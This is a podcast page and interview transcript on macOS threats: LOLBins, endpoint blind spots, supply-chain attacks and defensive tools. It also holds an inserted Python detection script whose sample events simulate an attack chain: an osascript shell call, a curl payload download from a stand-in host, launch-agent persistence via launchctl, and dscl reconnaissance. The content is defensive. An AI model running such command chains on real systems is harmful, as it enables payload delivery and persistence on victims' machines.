Cyber Threat Intelligence Podcast

Inside macOS Security: Blind Spots, LOLBins, And Supply Chain Risks (Olivia Gallucci & Pedro Kertzman)

Pedro Kertzman Season 2 Episode 2

Think your Mac is the safe corner of the network? Olivia Gallucci joins Pedro Kertzman to dismantle the myth of “secure by default” and show how modern attackers slip past comfort-zone defenses. We dig into the real blind spots on macOS, why unified logging and strict entitlements complicate endpoint visibility, and how Apple’s Endpoint Security API helps—while still leaving gaps clever adversaries can exploit.

Olivia walks us through the rise of living-off-the-land tactics on Mac, often called LOLBins, where trusted tools like osascript, curl, launchctl, bash, and dscl become covert malware helpers. Instead of fixating on blocklists, we explore behavior-based detections that catch suspicious parent-child process chains, stealthy downloads, and persistence via launch agents. We also trace the expanding attack surface created by enterprise adoption of Macs among developers, admins, and executives—users with access, keys, and data worth chasing.
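As an added, constructed illustration of the behavior-based approach the notes describe (not code from the episode, its guests, or any project they mention), the Python below walks parent-child chains in a batch of process exec events and flags the patterns discussed: a document app reaching osascript or a shell, a scripted curl download, launchctl registering a launch agent, and dscl enumeration. The event format, the list of office apps, the inclusion of sh/zsh among the shells, and every sample pid, path and URL are assumptions.

```python
"""Behaviour-based triage of macOS process events for living-off-the-land
chains and launch agent persistence. Constructed illustration: the event shape
stands in for endpoint telemetry (not Apple's Endpoint Security API)."""
from dataclasses import dataclass

# Binaries named in the episode as commonly repurposed; sh/zsh are an assumption.
LOLBINS = {"osascript", "curl", "launchctl", "bash", "sh", "zsh", "dscl"}
OFFICE_APPS = {"Microsoft Word", "Microsoft Excel", "Microsoft PowerPoint"}  # assumed list
PERSIST_DIRS = ("/Library/LaunchAgents/", "/Library/LaunchDaemons/")

@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    name: str        # executable basename, or app name for GUI apps
    argv: tuple      # argument vector captured at exec time

def ancestry(event, by_pid, limit=8):
    """Follow ppid links to build the process chain, oldest ancestor first."""
    chain, seen, cur = [event.name], {event.pid}, event
    while cur.ppid in by_pid and cur.ppid not in seen and len(chain) < limit:
        cur = by_pid[cur.ppid]
        seen.add(cur.pid)
        chain.append(cur.name)
    return list(reversed(chain))

def triage(events):
    """Apply four behaviour rules to exec events; return (pid, reason, chain) tuples."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        chain = ancestry(e, by_pid)
        label, ancestors = " > ".join(chain), set(chain[:-1])
        # Rule 1: a document app anywhere above a LOLBin = macro-style chain.
        if e.name in LOLBINS and ancestors & OFFICE_APPS:
            findings.append((e.pid, "office app spawned LOLBin", label))
        # Rule 2: curl fetching a URL beneath osascript = scripted payload download.
        if e.name == "curl" and "osascript" in ancestors and any(
                a.startswith(("http://", "https://")) for a in e.argv):
            findings.append((e.pid, "scripted download via curl", label))
        # Rule 3: launchctl loading a plist from a LaunchAgents/Daemons dir = persistence.
        if e.name == "launchctl" and any(a in ("load", "bootstrap") for a in e.argv) \
                and any(d in a for a in e.argv for d in PERSIST_DIRS):
            findings.append((e.pid, "launch agent/daemon registration", label))
        # Rule 4: dscl enumeration with no interactive Terminal above it = recon.
        if e.name == "dscl" and "-list" in e.argv and "Terminal" not in ancestors:
            findings.append((e.pid, "directory enumeration via dscl", label))
    return findings

SAMPLE_EVENTS = [  # constructed sample: a macro-driven chain, then benign admin work
    ProcEvent(200, 0, "Microsoft Word", ("Microsoft Word",)),
    ProcEvent(201, 200, "osascript", ("osascript", "-e", 'do shell script "sh /tmp/stage.sh"')),
    ProcEvent(202, 201, "sh", ("sh", "/tmp/stage.sh")),
    ProcEvent(203, 202, "curl", ("curl", "-s", "https://example.invalid/p")),
    ProcEvent(204, 202, "launchctl", ("launchctl", "load",
                                      "/Users/alice/Library/LaunchAgents/com.example.updater.plist")),
    ProcEvent(205, 202, "dscl", ("dscl", ".", "-list", "/Users")),
    ProcEvent(300, 0, "Terminal", ("Terminal",)),
    ProcEvent(301, 300, "zsh", ("zsh", "-l")),
    ProcEvent(302, 301, "curl", ("curl", "-O", "https://example.invalid/tool.tgz")),
    ProcEvent(304, 301, "dscl", ("dscl", ".", "-list", "/Users")),
]

if __name__ == "__main__":
    for pid, reason, chain in triage(SAMPLE_EVENTS):
        print(f"pid {pid}: {reason} [{chain}]")
```

The same dscl and curl invocations appear in both halves of the sample; only the chain above them separates the scripted use from the interactive one, which is the point of keying detections on ancestry rather than on the binary name.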

On the supply chain front, we unpack how developers get targeted through poisoned dependencies and compromised package ecosystems, with examples tied to CocoaPods issues and malicious packages pulling command-and-control frameworks. For end users, trojanized apps, shady installers, and macro-laced documents still work, and notarization alone isn’t a silver bullet. Olivia shares pragmatic safeguards: dependency pinning, signed builds, stricter MDM policies, and layered monitoring that blends Apple-native frameworks with network telemetry. To help users help themselves, she highlights Objective-See’s open source tools that flag camera, microphone, and persistence changes in plain language.

If you care about macOS security beyond the brochure, this conversation maps the terrain—what’s visible, what isn’t, and how to build defenses that hold up when trust fails. Subscribe, share with a teammate who uses a Mac at work, and leave a review with the one Mac detection you wish you had today.

Thanks for tuning in! If you found this episode valuable, don’t forget to subscribe, share, and leave a review. Got thoughts or questions? Connect with us on our LinkedIn Group: Cyber Threat Intelligence Podcast—we’d love to hear from you. If you know anyone with CTI expertise that would like to be interviewed in the show, just let us know. Until next time, stay sharp and stay secure!

Welcome And Guest Intro

Olivia Gallucci

macOS-targeted malware has been on the rise.

Rachael Tyrell

Hello and welcome to episode two, season two of your Cyber Threat Intelligence podcast. Whether you're a seasoned CTI expert, a cybersecurity professional, or simply curious about the digital battlefield, our expert guests and hosts will break down complex topics into actionable insights. On this episode of season two, our host Pedro Kertzman will chat with Olivia Gallucci, who is a security engineer with deep expertise in macOS internals, reverse engineering, and user space research. Olivia has presented at multiple conferences such as Black Hat, DEF CON, and several security BSides, just to name a few. Olivia is also a recipient of multiple awards, including from Women in CyberSecurity, and she is always bringing important awareness related to the security of macOS operating systems to a broader audience. Over to you, Pedro.

Pedro Kertzman

Olivia, thank you so much for coming to the show. I'm really happy to have you here.

Olivia Gallucci

Thank you so much for having me. I appreciate it.

Pedro Kertzman

So today we're gonna deep dive on the cyber part of CTI, and we're gonna talk about macOS, which is probably one of my favorite ones. Olivia, do you think we are past that fairy tale about Macs are secure by default, don't need security? What are your thoughts around that fairy tale?

The Mac Security Myth Debunked

Olivia Gallucci

Yeah, the idea that Macs are secure by default, I think is increasingly regarded as a myth. Weirdly, I still do see it occasionally, especially among uh developers and consumers, but within IT and security engineers, it's usually regarded as a joke. In recent years, macOS has faced a surge of issues, and I think amongst the security community, it it has ended up really dispelling that notion that built-in protections alone can keep consumers or enterprises safe. In general, uh, I think treating macOS or any system as inherently safe can lead to like a lot of blind spots. And my my personal advice would be to monitor Apple, like all Apple OSes, the same as you would any other OS, like a Linux, a Windows, or Android.

Pedro Kertzman

That's that's great advice, thank you. And how you know your story with macOS came to be? How you you know bumped into that probably in the past?

Olivia Gallucci

Yeah, so I when I was in high school, I switched schools and I went to a school that had a robotics program, and I got really into programming and open source software because the open source community would help me like do so much stuff despite not being related to what their their goals were. I was like, hey, I have this bug, can someone help me fix it? And they were like, sure. And I was really touched by this open source community, and then I'd watch this documentary on the anonymous hacker group, and I was like, okay, like I want to do open source offensive security. I began writing opinion pieces and blogs and stuff online about, you know, the open source software community and Debian and various other open source operating systems. And at some point, I had really gotten passionate about pointing out some of the claims Apple was making and how things weren't really aligned up. And so I was I was quite critical of Apple. And one of the red team managers there reached out to me and was like, Hey, at Apple, we appreciate think different. I'd love, I'd love for you to come work here. And during that interview process, I found a vulnerability like literally during the interview process. Holy. And that um that really went well. So that was kind of how I got into the Mac space, but before that, I hadn't touched a Mac in like seven years. And so I just I had a really great, I started off as an intern there and I had a really great experience there. So that's amazing. That's how it goes.

Pedro Kertzman

That's amazing. Imagine how many points you get to find a vulnerability during the interview process, right? That's quite unique. That's nice. Yeah, from an endpoint visibility standpoint. What are the things that, for example, you can't see on the macOS, like uh blind spots, any anything around that? Macs work differently, Apple provides a gazillion APIs for security or any other vendors to hook into. Any thoughts around best practices on that side of things?

Olivia’s Path Into macOS Security

Olivia Gallucci

Yeah, so Mac and Apple and and all of its OSes have kind of had this strange history because at different points in times there's been things obfuscated or things hidden, and then things also open source. Like Apple has over like 400 open source repositories available on GitHub. And it kind of shifts the conversation to you know what system you're talking about and then what timeline. So today, macOS imposes certain restrictions that, yes, create blind spots in endpoint monitoring. So, one example of this would be like Apple's unified logging system. It's off-limits to third-party security tools without special entitlements, meaning that like EDRs or AVs or any sort of endpoint security tool cannot read system logs for standard threat telemetry in a super easy and accessible way. However, it's not just endpoint monitoring that's affected. Even just like the standard red team engineer or researcher might have problems day-to-day if they don't have a dedicated test machine. Like Apple's uh System Integrity Protection prevents techniques like user mode hooking of processes. And as a result, you know, legacy endpoint solutions that relied on injecting code into running apps are now, you know, foiled. Today as well, Apple provides something known as the Endpoint Security API for authorized monitoring. This is an awesome solution, but not all system activity is exposed through it. And combined, these limitations plus Apple's strict like APIs mean that some malicious behaviors or system changes on macOS might go unseen by security software in contrast to the deep visibility that I guess other OSes provide and have normalized like Windows and Linux.

Pedro Kertzman

And uh, let's say, again, comparing those different operating systems and how security-wise people can help protect them. One common example these days is like living off the land techniques or low bring your own binaries or any living off-the-land related techniques on on the other OSes. Is that also a thing on macOS or how's that working on that particular scenario?

Endpoint Blind Spots On macOS

Olivia Gallucci

Yeah, so we have the like living off the land attacks on Mac, which is essentially just allowing legit system binaries to execute malicious tasks. Within the Apple security community, I think they're called LOOBins, or Living Off the Orchard Binaries. And like there's a standard like list somewhere, it's like it's like over like 30 built-in macOS binaries, and scripts have been to be like exploitable for Yikes purposes. Um, like common examples of this include osascript, which is the command line tool used to run AppleScript and JavaScript for automation, and people will use this to execute malicious scripts, or and then there's curl, which I think is available everywhere to you know to download payloads instead of like dropping obvious malware files. So, you know, by using these native tools, like Apple provided apps like bash, launchctl, osascript, et cetera, these attacks blend in normal system activity and can bypass certain security filters. And such LOLBin tactics have been observed at multiple stages of Mac attacks from the initial infection, like using curl or osascript in a macro or one-liner command, to the post-compromise actions using admin tools like dscl for reconnaissance. I guess the the the TLDR is that you know, Mac, like all OSes, kind of has its own group of pre-installed binaries that attackers can repurpose. And this can also make detections a little bit harder because the tools being used are actually legitimate programs. That said, you know, it's always good to use the tools that you know Mac and Apple makes available, you know, using Apple's official security frameworks to the fullest extent while acknowledging that there might be some blind spots because of these attacks.

Pedro Kertzman

No, that's that's awesome. It's pretty much like you say a Windows operating system, PowerShell. We kind of block the application, right? But you have to understand the behavior, the commands, and how you name it, the user or applications are leveraging that underlying technology on the on the OS itself. It makes total sense. Thank you. And and the other uh, you know, other than living off the land, the other super common or fairly common scenario these days, it's attacks that the as an industry will recognize as supply chain attacks. Is that also a thing in the macOS reality?

Olivia Gallucci

100%. And I think there's largely like two groups of supply chain attacks on Mac. So there's the developer and software supply chain side, and then there's the user-facing vectors in like the trust chain. To go into that first part, the macOS ecosystem has seen supply chain attacks targeting software developers and the the common software that they rely on. I remember in 2024, there was a pretty serious vulnerability. There might have been multiple, and a it's a package manager called CocoaPods. It raised the alarms because attackers could inject malicious code into iOS and macOS apps by hijacking third-party dependencies. Also, people have like actively planted malware in development tools and libraries. Like one one campaign in 2025 poisoned a Python package to pull a macOS version of Cobalt Strike. And this effectively compromised Macs through a seemingly legit like open source component. And as a as a group, these scenarios kind of show how attackers exploit that trust that developers place in frameworks and packages. To get into that second group, there's those user-facing areas. Here, the end users are also targeted via like macro malware and trojanized apps. So Macs are not you know immune to social engineering. Office macros remain a threat on Mac. So like Microsoft Office for Mac supports VBA macros, just like on Windows. So an unsuspecting user who enables macros in malicious, like in a malicious document, can execute malware on macOS. Attackers have also distributed trojanized apps and fake updates to Mac users. For example, like a malicious DMG installer masquerading as a cracked or popular app can deliver malware. This became super popular with infostealers like uh AMOS. Like that's one of the main techniques that they use. And then compounding on this issue, you know, Apple's own code signing and app notarization mechanisms, while adding really great security, are they're not foolproof.
There's there's been instances of Apple notarized malware slipping through automated checks, meaning that malware might arrive digitally signed and notarized by Apple on your machine. Holy. So these this abuse shows that even a trusted signature or an Apple notary ticket doesn't guarantee safety. So to me, you know, macOS faces supply chain risks at multiple levels from that developer pipeline, like vulnerable package repositories and tampered tooling, to the end user like the malicious office docs, the trojanized installers, and even occasionally subverted code signing. Again, I think you know, being mindful and having verification at each step is best rather than relying on a seam to trust.

Living Off The Land On Mac

Pedro Kertzman

Yeah, I know 100%. And you touched on a very interesting point. I hear more and more. It's related to, let's say, secure by design principles, software dependencies, right? You touched on that. And if you don't check that as a developer or as a security practitioner, maybe you need to go reverse engineer things to the to find out what's the underlying dependencies that you're actually agreeing to use without knowing that just by running a software, it's so important because uh we usually find out or hear more about dependencies when some open source superused Log4j example is used across the board that goes south, and then you see the industry is was basically entirely or for the most part relying on on things like that. If you think about macOS, the real like the reality of security for macOS versus the things we still have on the let's say marketing side. Any any thoughts around that?

Olivia Gallucci

Yeah, Apple has long promoted macOS as a secure platform, but with most things, the reality is more complex. Yes, in macOS benefits from strong security by design into the Unix-based architecture, the sandboxing, notarization requirements, and the many amazing features that Apple's built on top of uh plus many other things that were implemented in the ARM and the hardware and all that. Yet recent years have really proven that it is far from impervious. So, like macOS-targeted malware has been on the rise like really sharply for the past two years. So 2024 and 2025 saw a noticeable uptick in macOS-focused threats from the infostealer malware as a service to to nation state spyware. In fact, this is part of the reason why like my career kind of kicked off outside of Apple because a lot of people like didn't really understand why I was even focusing in this area. But when infostealers came along, they were like, oh, you know, maybe Mac Mac security like actually matters. Like uh and I attackers really recognized that the enterprises like they're starting to adapt Apple products, and they're becoming this like growing user base of Macs in these enterprise environments, and that that's a lot of money. So the old marketing notion that you know Macs don't get viruses has been, in my opinion, thoroughly debunked. But again, there's that lingering perception that persists among like the average consumers and some developers, and this misconception can can breed a false sense of security. In reality, I think uh macOS now faces many of the same threats as other OSes. To give like two examples, like I'd say like ransomware groups. I remember like they a bunch of them started actually adopting their Windows and Linux payloads to Mac. And like 20 in 2022, I think it was, macOS malware was predicted to make up around like six percent of all infections in 2022. I think this is according to a company called Securonix.
And every single time like I read a new article, it's like it's no longer six percent, it's like 13% or 15%. And it's just like that number has just been climbing like regardless of really where you look. And you know, I'd warn that over-reliance on Apple's built-in protections like Gatekeeper, XProtect, and sandboxing is unwise because these measures can only catch some of the attacks due to most of them using social engineering, and hackers just continuously find ways around them. So the security marketing around macOS being virus-free or requiring no extra protection no longer holds true. And I think the person that is going to suffer the most from this will be the average consumer.

Pedro Kertzman

Yeah, no, that's that's a great point. I think also with that statistics of the increasing attacks and compromises, users probably changed back in the day. We mostly saw Macs on marketing or digital-related like roles. Now, like programmers, people with root access to other things, like more, let's say juicy admin rights for threat actors, and you name it, directors like C level. They always have their own Macs. Everybody has Windows, that guy has a Mac.

Supply Chain And Trust Failures

Olivia Gallucci

Yeah, uh a hundred percent. The users have definitely changed. Apple was seen as almost a status symbol for for many years, and I think to a degree today it still is. Like, I remember when I was in high school, and it was almost like a class differentiator of like who could afford a Mac versus like who had a Windows machine. Yeah, and there was a select like subset of kids who were like, I have a Linux machine, and some of these kids were kids who were like, Oh, I want my computer to run faster, but a lot of these kids were the kids that you would consider technical. And throughout college, I noticed like most people use Linux. A lot of the environments I was in were you know Linux heavy, especially for developers and all of that. And then I don't know what shifted, but something definitely did shift. I think maybe it was like the M1, the M2, like those that processing power, and I think AI and needing to have that processing power uh locally and wanting to have that that sleekness with it. I think it was something with that. That's not something that I could say back up with a study or anything like that. But I there was a hundred percent a user shift in today. A lot in developer environments I see now either mix all three of these operating systems or are Mac heavy. I've seen some companies be so Windows heavy, but those are usually ones in like finances or retail, uh professions that have been a little bit uh older than say the standard of like I'm gonna you know vibe code an app. Like most of those are I think are Mac heavy people.

Pedro Kertzman

Yeah, no, absolutely. I saw I saw another day like a little joke that guy was on an airplane coding, no internet, no AI support, no stack overflow, just coding like an animal from memory, right? There, like it's you know, it's and it was a Mac, right? So it's uh Wow, yeah, that surprises me.

Olivia Gallucci

That actually really surprises me. I feel like to to this day, still, like Linux users and they can beat me at anything, like they're like, Yeah, I have this like kernel module I put, and I'm like, that's amazing. Like, I wish I wish I knew what you were doing.

Pedro Kertzman

Yeah, current kernel is like serious stuff if you go down that path. It's interesting. Yeah, I admire can who can do that. But Olivia, any other thoughts, suggestions for people using Macs or planning to use Macs on the security side of things? Any thoughts around that?

Olivia Gallucci

Yeah, I think the best thing users can do is if if this is a macOS specific advice, there's an amazing open source software repository or software, I guess, account on GitHub called Objective-See. And this account has all of these amazing security tools, they're all open source, you can see what they're doing, and each one does a different thing. So one of them can tell you if an application is currently accessing or using your camera or microphone. One tactic that malware uses is it will change your volume or access your camera or microphone, and it will just tell you when that happens. Another one that's there will show you if someone has tried to like tamper with your machine where you weren't around. Like, I think it takes a picture of like the person who's like trying to log in. That's happening. Some of them will show you if like a new system extension has been added to your machine, and pretty much anyone can like benefit from having these extra security protections. I think the original intent was to help like journalists and stuff, but the the average malware now on Mac attacks these same things. So it's just a good extra safety protection and it's something that is accessible and easy for the average person to install and use. And make a shout-out to Patrick Wardle for creating those tools and making Mac security accessible to the average user.

Pedro Kertzman

That's awesome. Olivia, thank you so much for all the insights. Really appreciate you coming to the show. And I hope I'll see you around. Thank you.

Olivia Gallucci

Of course. Thank you so much.

Rachael Tyrell

And that's a wrap. Thanks for tuning in. If you found this episode valuable, don't forget to subscribe, share, and leave a review. Got thoughts or questions? Connect with us on our LinkedIn group, Cyber Threat Intelligence Podcast. We'd love to hear from you. If you know anyone with CTI expertise that would like to be interviewed in the show, just let us know. Until next time, stay sharp and stay secure.